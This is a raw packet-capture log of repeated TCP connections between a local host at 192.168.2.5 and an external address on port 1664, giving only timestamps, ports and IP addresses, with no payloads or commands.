Nov 1, 2024 06:19:00.850759983 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850769997 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.850789070 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850802898 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.850821018 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850852966 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850867033 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.850884914 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850927114 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850940943 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.850959063 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.850995064 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.851007938 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.851027012 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.851059914 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.851089001 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.851103067 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.851123095 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.851136923 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.851156950 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.851186037 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.851213932 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.851221085 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.851258039 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.851681948 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.851730108 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.851763964 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.851810932 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.851813078 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.851845026 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.851852894 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.851877928 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.851911068 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.851958036 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.851977110 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852010965 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852056980 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.852060080 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852091074 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852094889 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.852123976 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852157116 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852188110 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852196932 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.852225065 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852233887 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.852257013 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852291107 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852324963 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852336884 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.852358103 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852368116 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.852391005 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852422953 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852456093 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852462053 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.852488995 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852503061 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.852520943 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852554083 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852561951 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.852586031 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852618933 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852631092 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.852652073 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852684975 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852705002 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.852718115 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.852809906 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.853152990 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.853203058 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.853235006 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.853270054 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.853280067 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.853302956 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.853312016 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.982922077 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:01.018280983 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:01.018321037 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:01.018378019 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:01.018399000 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:01.018413067 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:01.018445969 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:01.018481016 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:01.018488884 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:01.018532038 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:01.176151037 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:05.432964087 CET	49710	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:05.438468933 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:05.438548088 CET	49710	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:05.438985109 CET	49710	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:05.444188118 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:06.283817053 CET	49710	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:06.288724899 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:06.374885082 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:06.375046015 CET	49710	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:06.379848003 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:06.666320086 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:06.669204950 CET	49710	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:06.673994064 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:07.090234995 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:07.100474119 CET	49710	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:07.105427027 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:07.260212898 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:07.263695002 CET	49710	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:07.268718958 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:07.274996042 CET	49710	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:07.279948950 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:07.281023979 CET	49710	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:07.286365986 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:07.336174011 CET	49710	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:07.341046095 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:07.555150986 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:07.556453943 CET	49710	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:07.561212063 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:07.572361946 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:07.572707891 CET	49710	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:07.617804050 CET	1664	49710	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:08.297075987 CET	49710	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:12.319338083 CET	49713	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:12.324553013 CET	1664	49713	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:12.326745987 CET	49713	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:12.328543901 CET	49713	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:12.333378077 CET	1664	49713	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:12.333817959 CET	49713	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:12.338849068 CET	1664	49713	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:13.268491030 CET	1664	49713	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:13.268642902 CET	49713	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:13.273479939 CET	1664	49713	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:13.326854944 CET	49713	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:13.332155943 CET	1664	49713	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:13.561650038 CET	1664	49713	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:13.565440893 CET	49713	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:13.570393085 CET	1664	49713	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:13.979217052 CET	1664	49713	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:13.979680061 CET	49713	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:13.984433889 CET	1664	49713	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:14.147252083 CET	1664	49713	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:14.154911995 CET	49713	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:14.159662962 CET	1664	49713	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:14.159751892 CET	49713	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:14.164540052 CET	1664	49713	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:14.166100979 CET	49713	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:14.171097994 CET	1664	49713	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:14.327379942 CET	49713	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:18.342802048 CET	49729	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:18.347949982 CET	1664	49729	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:18.348053932 CET	49729	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:18.348336935 CET	49729	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:18.353244066 CET	1664	49729	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:19.290569067 CET	1664	49729	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:19.290770054 CET	49729	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:19.295608044 CET	1664	49729	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:19.326894999 CET	49729	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:19.331753016 CET	1664	49729	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:19.588390112 CET	1664	49729	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:19.593420029 CET	49729	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:19.598278046 CET	1664	49729	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:20.010900974 CET	1664	49729	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:20.011295080 CET	49729	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:20.016088009 CET	1664	49729	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:20.188838005 CET	1664	49729	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:20.189359903 CET	49729	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:20.194173098 CET	1664	49729	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:20.194266081 CET	49729	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:20.199052095 CET	1664	49729	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:20.200100899 CET	49729	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:20.204967022 CET	1664	49729	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:20.342504025 CET	49729	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:24.358457088 CET	49760	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:24.364239931 CET	1664	49760	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:24.364345074 CET	49760	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:24.364629030 CET	49760	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:24.370371103 CET	1664	49760	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:24.373796940 CET	49760	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:24.378659010 CET	1664	49760	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:25.294979095 CET	1664	49760	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:25.295279980 CET	49760	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:25.300760984 CET	1664	49760	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:25.373809099 CET	49760	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:25.378717899 CET	1664	49760	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:25.583867073 CET	1664	49760	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:25.587491035 CET	49760	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:25.592343092 CET	1664	49760	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:25.999605894 CET	1664	49760	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:26.000155926 CET	49760	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:26.005234957 CET	1664	49760	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:26.164936066 CET	1664	49760	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:26.165663958 CET	49760	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:26.170615911 CET	1664	49760	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:26.170706034 CET	49760	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:26.175673962 CET	1664	49760	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:26.212246895 CET	49760	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:26.217320919 CET	1664	49760	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:26.373703003 CET	49760	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:30.393682957 CET	49794	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:30.399447918 CET	1664	49794	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:30.402190924 CET	49794	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:30.402478933 CET	49794	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:30.408369064 CET	1664	49794	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:30.477669001 CET	49794	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:30.482573032 CET	1664	49794	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:31.339356899 CET	1664	49794	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:31.339595079 CET	49794	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:31.345817089 CET	1664	49794	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:31.467571020 CET	49794	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:31.472397089 CET	1664	49794	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:31.633018017 CET	1664	49794	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:31.636322975 CET	49794	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:31.641344070 CET	1664	49794	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:32.065741062 CET	1664	49794	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:32.066222906 CET	49794	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:32.071082115 CET	1664	49794	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:32.235945940 CET	1664	49794	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:32.236464024 CET	49794	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:32.241286993 CET	1664	49794	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:32.241353989 CET	49794	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:32.246247053 CET	1664	49794	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:32.246562004 CET	49794	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:32.251382113 CET	1664	49794	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:32.467626095 CET	49794	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:36.483400106 CET	49827	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:36.488353968 CET	1664	49827	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:36.492125988 CET	49827	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:36.492342949 CET	49827	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:36.497754097 CET	1664	49827	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:36.500112057 CET	49827	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:36.505089045 CET	1664	49827	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:37.436273098 CET	1664	49827	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:37.436472893 CET	49827	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:37.441384077 CET	1664	49827	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:37.498984098 CET	49827	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:37.503830910 CET	1664	49827	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:37.733026981 CET	1664	49827	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:37.736380100 CET	49827	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:37.741219044 CET	1664	49827	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:38.147414923 CET	1664	49827	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:38.147823095 CET	49827	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:38.152781010 CET	1664	49827	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:38.319273949 CET	1664	49827	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:38.319744110 CET	49827	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:38.324570894 CET	1664	49827	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:38.324639082 CET	49827	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:38.329436064 CET	1664	49827	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:38.336052895 CET	49827	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:38.340879917 CET	1664	49827	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:38.514467955 CET	49827	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:42.530539989 CET	49862	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:42.535375118 CET	1664	49862	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:42.535444021 CET	49862	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:42.535720110 CET	49862	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:42.540683985 CET	1664	49862	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:43.493540049 CET	1664	49862	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:43.496282101 CET	49862	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:43.501424074 CET	1664	49862	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:43.688692093 CET	49862	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:43.693785906 CET	1664	49862	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:43.797995090 CET	1664	49862	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:43.802480936 CET	49862	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:43.807317972 CET	1664	49862	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:44.221518040 CET	1664	49862	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:44.222131968 CET	49862	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:44.227123022 CET	1664	49862	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:44.435422897 CET	1664	49862	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:44.436038971 CET	49862	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:44.441942930 CET	1664	49862	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:44.442023039 CET	49862	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:44.447181940 CET	1664	49862	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:44.450133085 CET	49862	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:44.455032110 CET	1664	49862	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:44.670689106 CET	49862	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:48.687644005 CET	49896	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:48.740468025 CET	1664	49896	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:48.742759943 CET	49896	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:48.743097067 CET	49896	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:48.747900009 CET	1664	49896	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:49.719815016 CET	49896	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:49.724412918 CET	1664	49896	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:49.725864887 CET	1664	49896	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:49.725924969 CET	49896	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:49.730874062 CET	1664	49896	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:50.030276060 CET	1664	49896	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:50.032958031 CET	49896	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:50.037930965 CET	1664	49896	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:50.495693922 CET	1664	49896	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:50.496294022 CET	49896	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:50.503891945 CET	1664	49896	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:50.641623020 CET	1664	49896	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:50.642224073 CET	49896	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:50.647460938 CET	1664	49896	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:50.647505045 CET	49896	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:50.652796984 CET	1664	49896	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:50.690817118 CET	49896	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:50.695760965 CET	1664	49896	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:50.733220100 CET	49896	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:54.749267101 CET	49931	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:54.754961967 CET	1664	49931	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:54.755065918 CET	49931	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:54.755414963 CET	49931	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:54.761532068 CET	1664	49931	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:54.777302027 CET	49931	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:54.782123089 CET	1664	49931	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:55.712887049 CET	1664	49931	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:55.713084936 CET	49931	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:55.717962027 CET	1664	49931	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:55.780055046 CET	49931	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:55.784902096 CET	1664	49931	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:56.015980959 CET	1664	49931	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:56.018918037 CET	49931	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:56.023688078 CET	1664	49931	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:56.441181898 CET	1664	49931	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:56.441713095 CET	49931	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:56.446547985 CET	1664	49931	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:56.621454000 CET	1664	49931	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:56.622060061 CET	49931	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:56.626912117 CET	1664	49931	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:56.626975060 CET	49931	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:56.631814003 CET	1664	49931	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:56.631885052 CET	49931	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:56.636852026 CET	1664	49931	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:56.779989004 CET	49931	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:00.798203945 CET	49962	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:00.853585958 CET	1664	49962	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:00.853827000 CET	49962	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:00.868716002 CET	49962	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:00.875353098 CET	1664	49962	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:01.811368942 CET	49962	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:05.827434063 CET	49988	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:05.832441092 CET	1664	49988	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:05.832593918 CET	49988	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:05.832967997 CET	49988	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:05.837786913 CET	1664	49988	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:06.077464104 CET	49988	1664	192.168.2.5	66.63.187.113
